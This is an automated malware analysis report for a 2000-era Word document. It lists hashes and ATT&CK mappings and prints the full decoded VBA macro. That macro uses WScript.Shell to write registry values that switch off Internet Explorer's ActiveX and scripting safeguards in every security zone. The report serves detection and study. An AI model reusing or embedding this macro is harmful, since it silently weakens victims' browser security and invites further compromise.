Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01a7096fa3e345ec…

MALICIOUS

Office (OLE)

26.5 KB Created: 2000-12-30 18:12:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 7acb2a0a3a185b38df972a4a528ebab2 SHA-1: f2e8928317d7bcd1b339944a3f59b4ae6cab25f8 SHA-256: 01a7096fa3e345ec845451b5fa284d37facd49454668e1c73094a2ee1813ba16
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA script uses WScript.Shell to write registry values that lower Internet Explorer's security settings for local intranet and trusted sites zones. This is likely intended to bypass security warnings and facilitate the execution of malicious content or further exploitation. The script explicitly targets registry keys such as HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\1\1405.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1047 bytes
SHA-256: 4fe30b3bc177625d2baa1ace0d754953219c18ce161baeb2e696e47547774a6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'this script was written by Edrin@gmx.net
MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
' To trun off localhost-protection(127.0.0.1): i = 0 ()
' Warning: You can´t reset this with options of internet explorer! you have to reset it in registry yourself!!!!!
key = "HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\" + chr(i + 48) + "\"
' Chr(49) -> 1 in ASCII
A1 = key + "1405"
A2 = key + "1201"
A3 = key + "1001"
A4 = key + "1004"
WSHShell.RegWrite A1, 0, "REG_DWORD"
WSHShell.RegWrite A2, 0, "REG_DWORD"
WSHShell.RegWrite A3, 0, "REG_DWORD"
WSHShell.RegWrite A4, 0, "REG_DWORD"
Next
MsgBox "Done"

Open this report in the interactive analyzer, or submit your own file for analysis.